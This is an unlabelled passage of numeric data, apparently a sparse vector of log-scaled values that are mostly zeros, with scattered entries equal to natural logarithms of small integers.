5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.3978952727983707, 0.0, \n 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 4.330733340286331, 2.1972245773362196, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 10.532317184711113, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.924066185063897, 0.0, 0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.6931471805599453, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0, 0, 0, 0, 0.0,\n 0, 0, 0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 3.7369991058576035, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 4.518263445217987, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.772588722239781, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0, 1.3862943611198906, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 4.969640753475787, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 3.9384838577066197, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 6.292763799896557, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.772588722239781, 0.0, 0, 0, 0, 0, 0.0, \n 0.0, 0.0, 2.302585092994046, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.9120230054281455, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0,\n 0.0, 0, 0.0, 5.8377304471659395, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 3.2958368660043296, 0, 0.0, 0.0, 0.0, \n 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 2.5649493574615367, 0, 1.9459101490553132, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 2.833213344056216, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 3.8005740880419454, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 6.9558749307258045, \n 2.9444389791664403, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 3.295836866004329, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.302585092994046, 0.0, 1.3862943611198906, 0, 0, 0, 0, 0.0, 0.0, \n 2.5649493574615367, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 4.770684624465665, 0, 0, 0.0, 0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.3322045101752034, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.8066624897703196, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.454347296253507, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6888794541139363, 0, 0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.795790545596741, 2.833213344056216, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 8.73323621912248, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0, 8.105134969404936, \n 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 2.8398715690385097, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, \n 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0, 3.2188758248682006, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 4.07753744390572, 0.0, 0, 0.0, 0, 4.605170185988092,\n 3.295836866004329, 0, 0, 0.0, 3.7376696182833684, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.784189633918261, 0.0, 0.0, 0.0, 3.3322045101752034, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.772588722239781,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.87326690740586, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.7369991058576035, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 